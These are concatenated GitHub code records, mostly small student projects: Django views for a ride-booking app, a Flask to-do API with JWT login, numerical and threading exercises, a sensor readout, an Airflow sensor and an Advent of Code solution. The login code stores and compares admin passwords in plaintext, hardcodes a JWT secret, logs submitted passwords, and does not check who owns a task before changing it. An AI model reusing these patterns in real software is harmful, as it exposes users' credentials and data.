database\n admin = Admin(admin_name=admin_name, password=password)\n admin.save()\n\n return Response({\"message\": \"Admin created successfully\"}, status=status.HTTP_201_CREATED)\n\n\nclass AdminLoginView(APIView):\n def post(self, request):\n admin_name = request.data.get('admin_name')\n password = request.data.get('password')\n\n try:\n admin = Admin.objects.get(admin_name=admin_name, password=password)\n except Admin.DoesNotExist:\n return Response({\"message\": \"Invalid admin credentials\"}, status=status.HTTP_401_UNAUTHORIZED)\n\n return Response({\"message\": \"Admin login successfully\", \"admin_name\": admin.admin_name, \"admin_id\": admin.id}, status=status.HTTP_200_OK)\n\n\nclass AdminUpdateView(APIView):\n def put(self, request):\n admin_id = 1 # Assuming there's only one admin with ID 1\n admin_name = request.data.get('admin_name')\n password = request.data.get('password')\n\n try:\n admin = Admin.objects.get(id=admin_id)\n admin.admin_name = admin_name\n admin.password = password\n admin.save()\n except Admin.DoesNotExist:\n return Response({\"message\": \"Admin not found\"}, status=status.HTTP_404_NOT_FOUND)\n\n return Response({\"message\": \"Admin updated successfully\"}, status=status.HTTP_200_OK)\n\n\nclass PendingDriversView(APIView):\n def get(self, request):\n pending_drivers = CustomDriver.objects.filter(status='pending')\n serializer = CustomDriverSerializer(pending_drivers, many=True)\n return Response({\"driver_details\": serializer.data}, status=status.HTTP_200_OK)\n\n\nclass DriverActivationView(APIView):\n def post(self, request):\n email = request.data.get('email')\n\n try:\n driver = CustomDriver.objects.get(email=email, status='pending')\n except CustomDriver.DoesNotExist:\n return Response({\"message\": \"Driver with pending status and provided email not found\"}, status=status.HTTP_404_NOT_FOUND)\n\n # Generate a random password\n password = ''.join(random.choices(string.ascii_letters + string.digits, k=8))\n\n # Validate the password\n try:\n validate_password(password)\n except ValidationError as e:\n return Response({\"message\": \"Invalid generated password\"}, status=status.HTTP_400_BAD_REQUEST)\n\n # Update the driver's status and save the password\n driver.status = 'activate'\n driver.set_password(password)\n driver.save()\n\n # Send email to the driver with their credentials\n send_mail(\n 'Driver Activation',\n f'Your account has been activated.\\n\\nEmail: {email}\\nPassword: {password}',\n 'from@example.com',\n [email],\n fail_silently=False,\n )\n\n return Response({\"message\": \"Driver activated and email sent\", \"email\": email}, status=status.HTTP_200_OK)\n\n\n@api_view(['GET'])\ndef total_users(request):\n total_users = CustomUser.objects.count()\n return Response({'total_users': total_users})\n\n\n@api_view(['GET'])\ndef total_drivers(request):\n total_drivers = CustomDriver.objects.count()\n return Response({'total_drivers': total_drivers})\n\n\n@api_view(['GET'])\ndef total_request_ids(request):\n total_booking = RideRequest.objects.count()\n return Response({'total_booking': total_booking})\n\n\n@api_view(['GET'])\ndef total_model_names(request):\n model_names = CustomDriver.objects.values('model_name').distinct().count()\n return Response({'total_vehicles': model_names})\n\n\n@api_view(['GET'])\ndef get_all_reviews(request):\n reviews = Review.objects.all()\n review_data = []\n\n for review in reviews:\n review_info = {\n 'driver_full_name': review.driver.full_name,\n 'note': review.note,\n 'rating': review.rating\n }\n 
review_data.append(review_info)\n\n return Response({'reviews': review_data})\n\n\n@api_view(['GET'])\ndef get_total_request_ids(request):\n ride_requests = RideRequest.objects.all()\n request_data = []\n\n for ride_request in ride_requests:\n driver_phone_number = ''\n if ride_request.accepted_driver:\n driver_phone_number = ride_request.accepted_driver.phone_number\n\n request_info = {\n 'model_name': ride_request.accepted_driver.model_name if ride_request.accepted_driver else '',\n 'user_current_location': ride_request.user.current_location,\n 'user_destination_location': ride_request.user.destination_location,\n 'driver_phone_number': driver_phone_number\n }\n request_data.append(request_info)\n\n total_request_ids = len(ride_requests)\n\n response_data = {\n 'Routes': request_data\n }\n\n return Response(response_data)\n","repo_name":"yasherali/BidzOn","sub_path":"bidzOn/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":47194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"12452334507","text":"from flask import Flask, send_from_directory, session, jsonify\nfrom flask_session import Session\nfrom flask_restful import Api, Resource, reqparse\nfrom flask_cors import CORS # comment this on deployment\n\n# from api.HelloApiHandler import HelloApiHandler\nfrom flask_jwt_extended import create_access_token, get_jwt, get_jwt_identity, unset_jwt_cookies, jwt_required, JWTManager\nfrom flask_restful import Api, Resource, reqparse\nfrom datetime import datetime, timedelta\nfrom pytz import all_timezones, timezone\nfrom cs50 import SQL\nfrom werkzeug.security import check_password_hash, generate_password_hash\n\nmonthsAbbrev = ['Jan', 'Feb', 'Mar', 'Apr', 'May',\n 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dic']\n\ndb = SQL(\"sqlite:///doMe.db\")\n\n\nclass HelloApiHandler(Resource):\n def get(self):\n return 'ok'\n\n @jwt_required()\n def post(self):\n print(self)\n now = datetime.now(timezone('CST6CDT'))\n parser = reqparse.RequestParser()\n parser.add_argument('type', type=str)\n args = parser.parse_args()\n requestType = args['type']\n # LOADING TASKS\n if requestType == 'load':\n print('loadingggggggg POOOOOOSSST')\n parser.add_argument('userId', type=int)\n args = parser.parse_args()\n print('HERE IS THE USER ID:', args['userId'])\n taskListYesterday = db.execute(\n \"SELECT * FROM pending_tasks WHERE year = ? AND month = ? AND day = ? AND user_id = ? ORDER BY display_index DESC\", now.year, now.month, now.day - 1, args['userId'])\n taskListToday = db.execute(\n \"SELECT * FROM pending_tasks WHERE year = ? AND month = ? AND day = ? AND user_id = ? ORDER BY display_index DESC\", now.year, now.month, now.day, args['userId'])\n taskListTomorrow = db.execute(\n \"SELECT * FROM pending_tasks WHERE year = ? AND month = ? AND day = ? AND user_id = ? ORDER BY display_index DESC\", now.year, now.month, now.day + 1, args['userId'])\n showDays = db.execute(\"SELECT show_days FROM ui_settings\")\n showDone = db.execute(\n \"SELECT show_done FROM users WHERE id = ?\", args['userId'])\n print(showDays[0]['show_days'])\n print(showDone[0]['show_done'])\n\n taskListYesterday += db.execute(\"SELECT * FROM finished_tasks WHERE year = ? AND month = ? AND day = ? AND user_id = ? ORDER BY display_index DESC\",\n now.year, now.month, now.day - 1, args['userId'])\n taskListToday += db.execute(\"SELECT * FROM finished_tasks WHERE year = ? AND month = ? AND day = ? AND user_id = ? 
ORDER BY display_index DESC\",\n now.year, now.month, now.day, args['userId'])\n taskListTomorrow += db.execute(\"SELECT * FROM finished_tasks WHERE year = ? AND month = ? AND day = ? AND user_id = ? ORDER BY display_index DESC\",\n now.year, now.month, now.day + 1, args['userId'])\n return {'tasks': [taskListYesterday, taskListToday, taskListTomorrow], 'showOtherDays': showDays[0]['show_days'], 'showDone': showDone[0]['show_done'], }\n # DELETING TASKS\n if requestType == 'delete':\n parser.add_argument('taskId', type=str)\n parser.add_argument('done', type=str)\n args = parser.parse_args()\n if int(args['done']):\n db.execute(\n \"DELETE FROM finished_tasks WHERE id = ?\", args['taskId'])\n else:\n db.execute(\"DELETE FROM pending_tasks WHERE id = ?\",\n args['taskId'])\n print(args['taskId'])\n return\n # LOAD HISTORY\n if requestType == 'histo':\n parser.add_argument('userId', type=int)\n args = parser.parse_args()\n print('HERE IS THE USER ID:', args['userId'])\n history = db.execute(\n 'SELECT * FROM finished_tasks WHERE user_id = ? ORDER BY id DESC', args['userId'])\n return {'history': history}\n\n # ADDING TASKS\n if requestType == 'post':\n parser.add_argument('description', type=str)\n parser.add_argument('day', type=str)\n parser.add_argument('userId', type=int)\n args = parser.parse_args()\n print(args['description'], args['day'], args['userId'])\n if args['day'] == 'tomorrow':\n day = now.day + 1\n else:\n day = now.day\n print(now.year)\n print(now.month)\n print(day)\n db.execute(\"INSERT INTO pending_tasks (display_index, description, year, month, day, user_id) VALUES (((SELECT display_index FROM pending_tasks ORDER BY display_index DESC LIMIT 1) + 1), ?, ?, ?, ?, ?)\",\n args['description'], now.year, now.month, day, args['userId'])\n return\n # TOGGLE DONE STATUS\n if requestType == 'done':\n print('the client called me')\n parser.add_argument('taskId', type=str)\n parser.add_argument('done', type=str)\n args = parser.parse_args()\n if int(args['done']) == 0:\n Tasks = db.execute(\n \"SELECT * FROM pending_tasks WHERE id = ?\", args['taskId'])\n doneTask = Tasks[0]\n print(doneTask)\n db.execute(\"INSERT INTO finished_tasks (display_index, description, year, month, day, user_id) VALUES (((SELECT display_index FROM finished_tasks ORDER BY display_index DESC LIMIT 1) + 1), ?, ?, ?, ?, ?)\",\n doneTask['description'], doneTask['year'], doneTask['month'], doneTask['day'], doneTask['user_id'])\n db.execute(\"DELETE FROM pending_tasks WHERE id = ?\",\n args['taskId'])\n else:\n Tasks = db.execute(\n \"SELECT * FROM finished_tasks WHERE id = ?\", args['taskId'])\n doneTask = Tasks[0]\n print(doneTask)\n db.execute(\"INSERT INTO pending_tasks (display_index, description, year, month, day, user_id) VALUES ((SELECT display_index FROM pending_tasks ORDER BY display_index ASC LIMIT 1) - 1, ?, ?, ?, ?, ?)\",\n doneTask['description'], doneTask['year'], doneTask['month'], doneTask['day'], doneTask['user_id'])\n db.execute(\n \"DELETE FROM finished_tasks WHERE id = ?\", args['taskId'])\n return\n # PASSING YESTERDAY'S UNFINISHED TASKS TO TODAYS LIST\n if requestType == 'pass':\n parser.add_argument('userId', type=int)\n args = parser.parse_args()\n print('Pass tasks of user:')\n print(args['userId'])\n Tasks = db.execute(\"SELECT * FROM pending_tasks WHERE year = ? AND month = ? AND day = ? AND user_id = ? 
ORDER BY display_index ASC\",\n now.year, now.month, now.day - 1, args['userId'])\n\n for task in Tasks:\n print(task)\n maxIndex = db.execute(\n \"SELECT display_index FROM pending_tasks WHERE year = ? AND month = ? AND day = ? ORDER BY display_index DESC LIMIT 1\", now.year, now.month, now.day)\n if maxIndex:\n new_index = maxIndex[0]['display_index'] + 1.0\n else:\n new_index = 1.0\n print(new_index)\n db.execute(\"UPDATE pending_tasks SET day = ?, display_index = ? WHERE id = ?\",\n now.day, new_index, task['id'])\n return\n # EXECUTING LIST UPDATES AFTER DRAG AND DROP\n if requestType == 'dnd':\n parser.add_argument('srcId', type=int)\n parser.add_argument('sourceIndex', type=float)\n parser.add_argument('aboveDestContent', type=bool)\n parser.add_argument('aboveDestIndex', type=float)\n parser.add_argument('destinationContent', type=bool)\n parser.add_argument('destinationIndex', type=float)\n parser.add_argument('destinationDone', type=bool)\n parser.add_argument('srcDay', type=int)\n parser.add_argument('destDay', type=int)\n parser.add_argument('belowDestContent', type=bool)\n parser.add_argument('belowDestIndex', type=float)\n parser.add_argument('belowDestDone', type=bool)\n\n args = parser.parse_args()\n\n print(args['srcId'])\n print(args['sourceIndex'])\n print(args['aboveDestContent'], args['aboveDestIndex'])\n print(args['destinationContent'],\n args['destinationIndex'], args['destinationDone'])\n print(args['belowDestContent'],\n args['belowDestIndex'], args['belowDestDone'])\n print(args['srcDay'])\n print(args['destDay'])\n\n if not args['destinationDone']:\n if args['aboveDestContent']:\n if args['destinationContent']:\n if args['srcDay'] == args['destDay'] and args['sourceIndex'] >= args['destinationIndex']:\n if args['belowDestContent'] and not args['belowDestDone']:\n new_index = (\n args['destinationIndex'] + args['belowDestIndex'])/2.0\n else:\n new_index = args['destinationIndex'] - 1\n else:\n new_index = (\n args['destinationIndex'] + args['aboveDestIndex'])/2.0\n else:\n new_index = args['aboveDestIndex'] - 1\n else:\n if args['destinationContent']:\n print('hey')\n new_index = args['destinationIndex'] + 1\n else:\n new_index = 1\n else:\n if args['aboveDestContent']:\n new_index = args['aboveDestIndex'] - 1\n else:\n new_index = 1\n\n diff = args['destDay'] - args['srcDay']\n db.execute(\"UPDATE pending_tasks SET day = ?, display_index = ? WHERE id = ?\",\n now.day - 2 + args['srcDay'] + diff, new_index, args['srcId'])\n return\n # REMEMBERING LIST DISPLAY PREFERENCES\n if requestType == 'toggleDays':\n showDays = db.execute(\"SELECT show_days FROM ui_settings\")\n db.execute(\"UPDATE ui_settings SET show_days = ?\",\n 0 if showDays[0]['show_days'] else 1)\n return\n # REMEMBERING FINISHED TASKS DISPLAY PREFERENCES\n if requestType == 'hideDone':\n parser.add_argument('userId', type=int)\n args = parser.parse_args()\n showDone = db.execute(\n \"SELECT show_done FROM users WHERE id = ?\", args['userId'])\n db.execute(\"UPDATE users SET show_done = ? 
WHERE id = ?\",\n 0 if showDone[0]['show_done'] else 1, args['userId'])\n print('hey heres the user: ')\n return\n # final_ret = {\"status\": \"Success\", \"message\": message}\n # print(request_type)\n # print(request_json)\n return\n\n\nclass loginApiHandler(Resource):\n def post(self):\n parser = reqparse.RequestParser()\n parser.add_argument('type', type=str)\n args = parser.parse_args()\n requestType = args['type']\n # LOGIN\n if requestType == 'login':\n print('hi from login')\n parser.add_argument('username', type=str)\n parser.add_argument('password', type=str)\n args = parser.parse_args()\n print(args['username'])\n print(args['password'])\n rows = db.execute(\n \"SELECT * FROM users WHERE username = ?\", args['username'])\n if len(rows) != 1 or not check_password_hash(rows[0][\"hash\"], args['password']):\n response = {\"msg\": \"invalid\"}\n return response\n access_token = create_access_token(identity=args['username'])\n print(access_token)\n return {\"msg\": access_token, \"id\": rows[0][\"id\"]}\n # REGISTRATION\n if requestType == 'register':\n print('hi from register')\n parser.add_argument('username', type=str)\n parser.add_argument('password', type=str)\n args = parser.parse_args()\n print(args['username'])\n print(args['password'])\n rows = db.execute(\n \"SELECT * FROM users WHERE username = ?\", args['username'])\n print('registered users')\n print(rows)\n if len(rows) != 0:\n response = jsonify({\"msg\": \"taken\"})\n return response\n # REGISTERING NEW USER\n hash = generate_password_hash(\n args['password'], method='pbkdf2:sha256', salt_length=8)\n db.execute(\n \"INSERT INTO users (username, hash) VALUES (?, ?)\", args['username'], hash)\n rows = db.execute(\n \"SELECT * FROM users WHERE username = ?\", args['username'])\n access_token = create_access_token(identity=rows[0][\"id\"])\n print(access_token)\n return {\"msg\": access_token, \"id\": rows[0][\"id\"]}\n # LOGOUT\n if requestType == 'logout':\n response = jsonify({\"msg\": \"logout successful\"})\n unset_jwt_cookies(response)\n return response\n\n\napp = Flask(__name__, static_url_path='', static_folder='react-frontend/build')\nCORS(app) # comment this on deployment\napi = Api(app)\n\napp.config[\"JWT_SECRET_KEY\"] = \"please-remember-to-change-me\"\napp.config[\"JWT_ACCESS_TOKEN_EXPIRES\"] = timedelta(hours=22)\njwt = JWTManager(app)\n\n\n@app.route(\"/\")\ndef serve():\n return \"ok\"\n\n\napi.add_resource(HelloApiHandler, '/api/tasks')\n\napi.add_resource(loginApiHandler, '/api/login')\n\n\nif __name__ == '__main__':\n app.run(port=8080)\n","repo_name":"OscarSantos1/diurnal","sub_path":"backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":14188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"27718950812","text":"import numpy as np\n\ndef LUdcmp(A):\n U = A\n L = np.eye(np.shape(A)[0])\n N = np.shape(A)[0]\n for j in range(1,N+1):\n for i in range(j+1,N+1):\n L[i-1,j-1] = U[i-1,j-1] / U[j-1,j-1]\n U[i-1,:] = U[i-1,:] - L[i-1,j-1]*U[j-1,:]\n return L,U\n\n\ndef BackSub(L, U, b):\n N = np.shape(L)[0]\n y = np.zeros((N,1))\n x = np.zeros((N,1))\n # Forward substitution\n y[0] = b[0]\n for i in range(1,N+1):\n y[i-1] = b[i-1] \n for j in range(1,i):\n y[i-1] = y[i-1] - y[j-1]*L[i-1,j-1]\n # backward substitution\n x[N-1] = y[N-1]\n for i in range(N,0,-1):\n x[i-1] = y[i-1]\n for j in range(i+1,N+1):\n x[i-1] = x[i-1] - x[j-1]*U[i-1,j-1]\n x[i-1] = x[i-1] / U[i-1,i-1]\n return x\n\n# def Singular(A):\n# (row,col) = 
np.shape(A)\n# for i in range(0,row):\n# for j in range(0,col):\n# if i==j:\n# if A[i,j]==0:\n# singular = True\n# return singular\n\nif __name__ == \"__main__\":\n \n A = np.array([[1,2,3],[4,6,5],[7,8,7]])\n b = np.array([1,1,2])\n \n # if Singular(A):\n # for j in range(0,np.shape(A)[1]):\n # col = list(A[:,j])\n # zero_pos = col.index(0)\n\n L, U = LUdcmp(A)\n x = BackSub(L,U,b)\n\n print(\"L\",L)\n print(\"\\n\")\n print(\"U\",U)\n print(\"\\n\")\n print(\"A:\", np.dot(L,U))\n print(\"\\n\")\n print(\"x:\",x)\n ","repo_name":"PatrickeTownsend/metodos-numericos-avanzados","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"12946971778","text":"\nimport pandas as pd\nimport numpy as np\nimport math\n\n\ndef get_decision(data):\n\t# calc total entropy\n\tpt = len(data.loc[data['rating'] == 'Positive'].index)\t\t\t# total number of positive rating\n\tnt = len(data.loc[data['rating'] == 'Negative'].index)\t\t\t# total number of negative rating\n\tif pt == 0 or nt == 0:\t\t\t\t\t\t\t# all cases have only positive or negative rating\n\t\tentropy_total = 0\n\telse:\t\t\t\t\t\t\t\t\t# all cases have both positive or negative rating\n\t\tentropy_total = -1 * (pt / (pt + nt) * math.log2(pt / (pt + nt)) + nt / (pt + nt) * math.log2(nt / (pt + nt)))\n\n\t# calc entropy and gain of each word\n\tcalculations = np.zeros(shape=[7, len(data.columns) - 1])\n\tfor col_name in data.columns:\n\t\tif col_name != 'rating':\n\t\t\tcol_index = data.columns.get_loc(col_name)\n\n\t\t\t# calc p1, n1, p0, n0\n\t\t\tcalculations[0, col_index] = len(data.loc[(data[col_name] == 1) & (data['rating'] == 'Positive')].index)\n\t\t\tcalculations[1, col_index] = len(data.loc[(data[col_name] == 1) & (data['rating'] == 'Negative')].index)\n\t\t\tcalculations[2, col_index] = len(data.loc[(data[col_name] == 0) & (data['rating'] == 'Positive')].index)\n\t\t\tcalculations[3, col_index] = len(data.loc[(data[col_name] == 0) & (data['rating'] == 'Negative')].index)\n\n\t\t\t# calc entropy at 1\n\t\t\tif calculations[0, col_index] == 0 and calculations[1, col_index] == 0:\t\t\t# no case with word = 1\n\t\t\t\tcalculations[4, col_index] = -1\n\t\t\telif calculations[0, col_index] == 0 or calculations[1, col_index] == 0:\t\t# pure decision at 1\n\t\t\t\tcalculations[4, col_index] = 0\n\t\t\telse:\n\t\t\t\tp = calculations[0, col_index] / (calculations[0, col_index] + calculations[1, col_index])\n\t\t\t\tn = calculations[1, col_index] / (calculations[0, col_index] + calculations[1, col_index])\n\t\t\t\tcalculations[4, col_index] = -1 * (p * math.log2(p) + n * math.log2(n))\n\n\t\t\t# calc entropy at 0\n\t\t\tif calculations[2, col_index] == 0 and calculations[3, col_index] == 0:\t\t\t# no case with word = 0\n\t\t\t\tcalculations[5, col_index] = -1\n\t\t\telif calculations[2, col_index] == 0 or calculations[3, col_index] == 0:\t\t# pure decision at 0\n\t\t\t\tcalculations[5, col_index] = 0\n\t\t\telse:\n\t\t\t\tp = calculations[2, col_index] / (calculations[2, col_index] + calculations[3, col_index])\n\t\t\t\tn = calculations[3, col_index] / (calculations[2, col_index] + calculations[3, col_index])\n\t\t\t\tcalculations[5, col_index] = -1 * (p * math.log2(p) + n * math.log2(n))\n\n\t\t\t# calc gain\n\t\t\tp1 = (calculations[0, col_index] + calculations[1, col_index]) / (pt + nt)\n\t\t\tp0 = (calculations[2, col_index] + calculations[3, col_index]) / (pt + nt)\n\t\t\tcalculations[6, col_index] = 
entropy_total - p1 * calculations[4, col_index] - p0 * calculations[5, col_index]\n\n\t# get index of word with max gain\n\tmax_index = np.argmax(calculations[6, :])\n\tdecision = -1\n\t\n\t\n\t\t# probabilities of word with max gain\n\tif calculations[4, max_index] == -1:\t\t\t# no case with word = 1\n\t\tp1 = n1 = -1\n\telse:\n\t\tp1 = calculations[0, max_index] / (calculations[0, max_index] + calculations[1, max_index])\n\t\tn1 = calculations[1, max_index] / (calculations[0, max_index] + calculations[1, max_index])\n\n\tif calculations[5, max_index] == -1:\t\t\t# no case with word = 0\n\t\tp0 = n0 = -1\n\telse:\n\t\tp0 = calculations[2, max_index] / (calculations[2, max_index] + calculations[3, max_index])\n\t\tn0 = calculations[3, max_index] / (calculations[2, max_index] + calculations[3, max_index])\n\n\t# if there is no case where either word = 1 or word = 0\n\tif p1 == -1 or p0 == -1:\n\t\tif pt >= nt:\n\t\t\tdecision = 4\t\t\t\t\t# pos at 1 and pos at 0\n\t\telse:\n\t\t\tdecision = 7\t\t\t\t\t# neg at 1 and neg at 0\n\n\t# if there is only one word\n\telif len(data.columns) == 2:\n\t\tif (p1 >= n1) and (p0 >= n0):\n\t\t\tdecision = 4\t\t\t\t\t# pos at 1 and pos at 0\n\t\telif (p1 >= n1) and (p0 <= n0):\n\t\t\tdecision = 5\t\t\t\t\t# pos at 1 and neg at 0\n\t\telif (p1 <= n1) and (p0 >= n0):\n\t\t\tdecision = 6\t\t\t\t\t# neg at 1 and pos at 0\n\t\telif (p1 <= n1) and (p0 <= n0):\n\t\t\tdecision = 7\t\t\t\t\t# neg at 1 and neg at 0\n\n\t# if there is pure decisions at word == 1 and also at word == 0\n\telif (calculations[4, max_index] == 0) and (calculations[5, max_index] == 0):\n\t\tif (p1 == 1) and (p0 == 1):\n\t\t\tdecision = 4\t\t\t\t\t# pos at 1 and pos at 0\n\t\telif (p1 == 1) and (n0 == 1):\n\t\t\tdecision = 5\t\t\t\t\t# pos at 1 and neg at 0\n\t\telif (n1 == 1) and (p0 == 1):\n\t\t\tdecision = 6\t\t\t\t\t# neg at 1 and pos at 0\n\t\telif (n1 == 1) and (n0 == 1):\n\t\t\tdecision = 7\t\t\t\t\t# neg at 1 and neg at 0\n\n\t# if there is a pure decision at word == 1\n\telif calculations[4, max_index] == 0:\n\t\tif p1 == 1:\n\t\t\tdecision = 0\t\t\t\t\t# pos at 1\n\t\telse:\n\t\t\tdecision = 1\t\t\t\t\t# neg at 1\n\n\t# if there is a pure decision at word == 0\n\telif calculations[5, max_index] == 0:\n\t\tif p0 == 1:\n\t\t\tdecision = 2\t\t\t\t\t# pos at 0\n\t\telse:\n\t\t\tdecision = 3\t\t\t\t\t# neg at 0\n\n\treturn max_index, decision\n","repo_name":"JohnEssam235/Data-St-project","sub_path":"get_decision.py","file_name":"get_decision.py","file_ext":"py","file_size_in_byte":4710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"3620106869","text":"import threading \nimport random\nimport time\nimport queue\n\n\nqueue = queue.Queue(10)\n\ndef Producer():\n while True:\n item = random.randint(1, 100)\n print(f\"Produced : {item}\")\n queue.put(item)\n time.sleep(random.random())\n\n\ndef Consumer():\n while True:\n num = queue.get()\n queue.task_done()\n print(f\"Consumed : {num}\")\n time.sleep(random.randint(2, 5))\n\nt1 = threading.Thread(target=Producer)\nt2 = threading.Thread(target=Consumer)\n\n\nt1.start()\nt2.start()\n\nt1.join()\nt2.join()\nqueue.join()","repo_name":"subhashishnabajja/college-code","sub_path":"sy/sem-3/operating-systems/practical-1/practical-1B/producer-consumer-message-passing.py","file_name":"producer-consumer-message-passing.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"68"} 
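Editor's note: the producer-consumer record that closes above never terminates; both loops are infinite, so its trailing t1.join(), t2.join() and queue.join() calls block forever. A minimal sketch, assuming a bounded item count and a hypothetical SENTINEL end-of-stream marker (neither is in the original file), of how those joins can actually return:

import queue
import random
import threading

q = queue.Queue(10)
SENTINEL = None  # hypothetical end-of-stream marker, not in the original snippet

def producer(n_items):
    # produce a bounded number of items, then signal completion
    for _ in range(n_items):
        item = random.randint(1, 100)
        print(f"Produced : {item}")
        q.put(item)
    q.put(SENTINEL)

def consumer():
    # drain the queue until the sentinel arrives
    while True:
        num = q.get()
        q.task_done()
        if num is SENTINEL:
            break
        print(f"Consumed : {num}")

t1 = threading.Thread(target=producer, args=(5,))
t2 = threading.Thread(target=consumer)
t1.start()
t2.start()
t1.join()
t2.join()
q.join()  # returns, since every put() now has a matching task_done()

With the sentinel in place, the final queue.join() does what the original snippet's trailing queue.join() appears to have intended.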
+{"seq_id":"27297416933","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport time\nimport numpy as np\n\n# import module controlling readout device\nfrom phypidaq.ADXL345Config import *\n\n# create an instance of the device\ndevice = ADXL345Config()\n\n# Initialize the device\ndevice.init()\n\n# reserve space for data (four channels here)\ndata = np.array([0., 0., 0.])\n\nprint('Starting readout. Type to stop')\n\n# read-out interval in s\ndt = 1.0\n# start time\nT0 = time.time()\n\n# Readout loop, stop with +C\nwhile True:\n device.acquireData(data)\n dT = time.time() - T0\n print('%.2g, %.2gm/s² %.2gm/s² %.2gm/s²' % (dT, data[0], data[1], data[2]))\n time.sleep(dt)\n","repo_name":"PhyPiDAQ/PhyPiDAQ","sub_path":"examples/read_ADXL345.py","file_name":"read_ADXL345.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"37984942950","text":"from __future__ import annotations\n\nfrom typing import TYPE_CHECKING, Any\n\nfrom airflow.exceptions import AirflowException\nfrom airflow.sensors.base import BaseSensorOperator\n\nfrom sample_provider.hooks.sample import SampleHook\n\nif TYPE_CHECKING:\n from airflow.utils.context import Context\n\n\nclass SampleSensor(BaseSensorOperator):\n \"\"\"\n Executes a HTTP GET statement and returns False on failure caused by 404 Not Found.\n\n :param sample_conn_id: The connection to run the sensor against\n :type sample_conn_id: str\n :param method: The HTTP request method to use\n :type method: str\n :param endpoint: The relative part of the full url\n :type endpoint: str\n :param request_params: The parameters to be added to the GET url\n :type request_params: a dictionary of string key/value pairs\n :param headers: The HTTP headers to be added to the GET request\n :type headers: a dictionary of string key/value pairs\n \"\"\"\n\n # Specify the arguments that are allowed to parse with jinja templating\n template_fields = [\n \"endpoint\",\n \"request_params\",\n \"headers\",\n ]\n\n def __init__(\n self,\n *,\n endpoint: str,\n sample_conn_id: str = SampleHook.default_conn_name,\n method: str = \"GET\",\n request_params: dict[str, Any] | None = None,\n headers: dict[str, Any] | None = None,\n **kwargs,\n ) -> None:\n super().__init__(**kwargs)\n self.endpoint = endpoint\n self.sample_conn_id = sample_conn_id\n self.request_params = request_params or {}\n self.headers = headers or {}\n\n self.hook = SampleHook(method=method, sample_conn_id=sample_conn_id)\n\n def poke(self, context: Context) -> bool:\n self.log.info(\"Poking: %s\", self.endpoint)\n try:\n response = self.hook.run(\n self.endpoint,\n data=self.request_params,\n headers=self.headers,\n )\n if response.status_code == 404:\n return False\n\n except AirflowException as exc:\n if str(exc).startswith(\"404\"):\n return False\n\n raise exc\n\n return True\n","repo_name":"astronomer/airflow-provider-sample","sub_path":"sample_provider/sensors/sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"68"} +{"seq_id":"23726415155","text":"import sys\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom main_project import Ui_MainWindow\nfrom ISIMM import ISIMM\nfrom os import environ\n\ndef suppress_qt_warnings():\n environ[\"QT_DEVICE_PIXEL_RATIO\"] = \"0\"\n environ[\"QT_AUTO_SCREEN_SCALE_FACTOR\"] = \"1\"\n environ[\"QT_SCREEN_SCALE_FACTORS\"] = \"1\"\n 
environ[\"QT_SCALE_FACTOR\"] = \"1\"\n \nif __name__ == \"__main__\":\n suppress_qt_warnings()\n\nclass main:\n def __init__(self):\n self.inst = ISIMM()\n self.fen = QtWidgets.QMainWindow()\n self.ui = Ui_MainWindow(self.inst)\n self.ui.setupUi(self.fen)\n self.fen.show()\n\napp = QtWidgets.QApplication(sys.argv)\nwindow=main()\napp.exec()","repo_name":"MazenSghaier/student-management","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"36364029721","text":"def main():\n part_1()\n part_2()\n\n\ndef part_1():\n inp = get_input('./inputs/02_actual.txt')\n\n total = 0\n\n for line in inp:\n line = line.strip()\n game_id, cubes = line.split(': ')\n possible = check_possibility(cubes)\n\n if possible:\n game_id = int(game_id.lstrip('Game '))\n total += game_id\n\n print('Part 1:', total)\n\n\ndef part_2():\n inp = get_input('./inputs/02_actual.txt')\n\n total = 0\n\n for line in inp:\n line = line.strip()\n game_id, cubes = line.split(': ')\n\n red = 0\n blue = 0\n green = 0\n\n sets = cubes.split(';')\n for s in sets:\n pairs = s.strip().split(', ')\n for pair in pairs:\n amount, color = pair.split(' ')\n if color == 'red' and int(amount) > red:\n red = int(amount)\n elif color == 'green' and int(amount) > green:\n green = int(amount)\n elif color == 'blue' and int(amount) > blue:\n blue = int(amount)\n total += (red * green * blue)\n\n print('Part 2:', total)\n\n\ndef check_possibility(cubes: []) -> bool:\n \"\"\" A game is only playable when there are no more than 12 red, 13 green and 14 blue cube for each set\n\n :param cubes: List with all sets of a game\n :return: True if the game is playable\n \"\"\"\n sets = cubes.split(';')\n for s in sets:\n pairs = s.strip().split(', ')\n for pair in pairs:\n amount, color = pair.split(' ')\n if (color == 'red' and int(amount) > 12 or\n color == 'green' and int(amount) > 13 or\n color == 'blue' and int(amount) > 14):\n return False\n return True\n\n\ndef get_input(file_path):\n with open(file_path) as f:\n return f.readlines()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"SimonHRD/advent-of-code","sub_path":"2023/02.py","file_name":"02.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"31985468352","text":"from aiogram.types import CallbackQuery, Message, ParseMode\nfrom aiogram.dispatcher import FSMContext\n\nfrom bot import dp, bot\nfrom state import FormState, FormItem\nfrom components.catalogueList import updateStateDataList, 